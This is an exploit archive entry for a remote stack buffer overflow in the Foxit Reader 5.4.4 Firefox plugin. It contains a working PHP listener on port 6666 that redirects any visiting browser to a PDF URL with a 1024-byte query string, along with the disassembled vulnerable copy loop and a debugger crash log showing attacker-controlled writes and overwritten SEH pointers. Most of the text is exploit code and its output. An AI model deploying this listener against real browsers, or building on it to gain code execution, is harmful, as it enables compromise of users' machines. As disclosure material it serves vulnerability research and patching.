Foxit Reader 5.4.4.1128 Plugin For Firefox Buffer Overflow

2013-01-08T00:00:00
ID PACKETSTORM:119306
Type packetstorm
Reporter rgod
Modified 2013-01-08T00:00:00

Description

                                        
<?php  
/*  
Foxit Reader <= 5.4.4.1128 Plugin for Firefox npFoxitReaderPlugin.dll Overlong   
Query String Remote Stack Buffer Overflow PoC --------------------------- rgod  
  
(listener)  
  
Tested against Microsoft Windows  
Mozilla Firefox 17.0.1  
Foxit Reader 5.4.3.0920  
Foxit Reader 5.4.4.1128  
  
File: npFoxitReaderPlugin.dll  
Version: 2.2.1.530  
  
Product url: http://www.foxitsoftware.com/downloads/  
Last version setup file: FoxitReader544.11281_enu_Setup.exe  
  
Usage:  
Launch from the command line, then browse port 6666 with Firefox.  
You can test it also through this url:  
  
http://192.168.0.1/x.pdf?[A x 1024]  
  
The file must exist, or the server must respond with  
the proper Content-Type header.  
  
vulnerable code, npFoxitReaderPlugin.dll:  
  
;------------------------------------------------------------------------------  
L1000162F:  
push ebx  
push esi  
push edi  
mov edi,ebp  
or ecx,FFFFFFFFh  
xor eax,eax  
xor ebx,ebx  
xor esi,esi  
repne scasb  
not ecx  
dec ecx  
test ecx,ecx  
jle L100016E4  
L1000164A:  
mov al,[esi+ebp]  
mov word ptr [esp+18h],0000h  
cmp al,25h  
jz L10001661  
mov ecx,[esp+1Ch]  
mov [ebx+ecx],al  
jmp L100016CE  
L10001661:  
mov al,[esi+ebp+01h]  
cmp al,30h  
jl L1000166D  
cmp al,39h  
jle L1000167D  
L1000166D:  
cmp al,41h  
jl L10001675  
cmp al,46h  
jle L1000167D  
L10001675:  
cmp al,61h  
jl L100016C6  
cmp al,66h  
jg L100016C6  
L1000167D:  
mov dl,[esi+ebp+01h]  
inc esi  
inc esi  
lea ecx,[esp+10h]  
mov [esp+18h],dl  
push ecx  
mov al,[esi+ebp]  
lea edx,[esp+1Ch]  
push L100450D4  
push edx  
mov [esp+25h],al  
call SUB_L10006421  
mov eax,[esp+1Ch]  
lea ecx,[esp+24h]  
push eax  
push L100450D0  
push ecx  
call SUB_L100063CF  
mov eax,[esp+34h]  
mov dl,[esp+30h]  
add esp,00000018h  
mov [ebx+eax],dl  
jmp L100016CE  
L100016C6:  
mov ecx,[esp+1Ch]  
mov byte ptr [ebx+ecx],25h  
L100016CE:  
inc ebx  
mov edi,ebp  
or ecx,FFFFFFFFh  
xor eax,eax  
inc esi  
repne scasb  
not ecx  
dec ecx  
cmp esi,ecx  
jl L1000164A  
L100016E4:  
mov edx,[esp+1Ch]  
pop edi  
pop esi  
mov eax,00000001h  
mov byte ptr [ebx+edx],00h  
pop ebx  
pop ebp  
pop ecx  
retn  
;------------------------------------------------------------------------------  
  
this copy loop bounds its destination index (ebx) only by the length of the   
source string at ebp (recomputed with repne scasb at the top of each iteration),   
never by the size of the destination buffer at [esp+1Ch], so an overlong query   
string ends up overwriting stack pointers; then   
(by attaching to plugin-container.exe):  
  
(f48.1778): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=0076ed4c ebx=00000341 ecx=002cf414 edx=002cf414 esi=41414141 edi=0076e9e8  
eip=10016852 esp=002cf3f8 ebp=75eacdf8 iopl=0 nv up ei pl nz na po nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202  
npFoxitReaderPlugin!NP_GetEntryPoints+0x15672:  
10016852 8906 mov dword ptr [esi],eax ds:0023:41414141=????????  
...  
Attempt to write to address 41414141  
...  
  
also SEH pointers are overwritten  
*/  
  
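// Silence PHP warnings/notices (e.g. from peers that drop the connection)
// and let the listener run indefinitely.
error_reporting(0);

set_time_limit(0);

$port = 6666;

// Reply for any request that is not for the .pdf: a redirect whose Location
// carries the overlong query string (1024 bytes) that the plugin copies
// without checking the destination buffer size (see the disassembly above).
$____redirect = "HTTP/1.1 301 Moved Permanently\r\n".
"Server: Apache\r\n".
"Location: /x.pdf?".str_repeat("A",1024)."\r\n".
"Content-Type: text/html\r\n\r\n";

// Reply for the .pdf request. As noted above, only the Content-Type header has
// to be right for the plugin to be invoked; no body follows these headers
// (the connection is closed right after they are written), whatever the
// Content-Length claims.
$____boom = "HTTP/1.1 200 OK\r\n".
"Server: Apache\r\n".
"Accept-Ranges: bytes\r\n".
"Content-Length: 60137\r\n".
"Content-Type: application/pdf\r\n".
"Connection: keep-alive\r\n\r\n";

// Binds on all interfaces (0.0.0.0): every host that can reach this port
// receives the redirect above.
$socket = stream_socket_server("tcp://0.0.0.0:".$port, $errno, $errstr);

if (!$socket) {
    echo "$errstr ($errno)\n";
} else {
    echo "Listening on public tcp port ".$port." \n";
    while ($conn = stream_socket_accept($socket)) {
        // Only the request line is read. fgets() returns false when the peer
        // closes without sending anything; normalise that to an empty string
        // so the strpos() below always sees a string.
        $line = fgets($conn);
        if ($line === false) {
            $line = "";
        }
        echo $line."\n";
        // strpos() yields 0 for a match at offset 0, which is falsy, so test
        // against false explicitly instead of relying on truthiness.
        if (strpos($line, ".pdf") !== false) {
            fwrite($conn, $____boom);
        } else {
            fwrite($conn, $____redirect);
        }
        fclose($conn);
    }
    fclose($socket);
}
?>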
  
  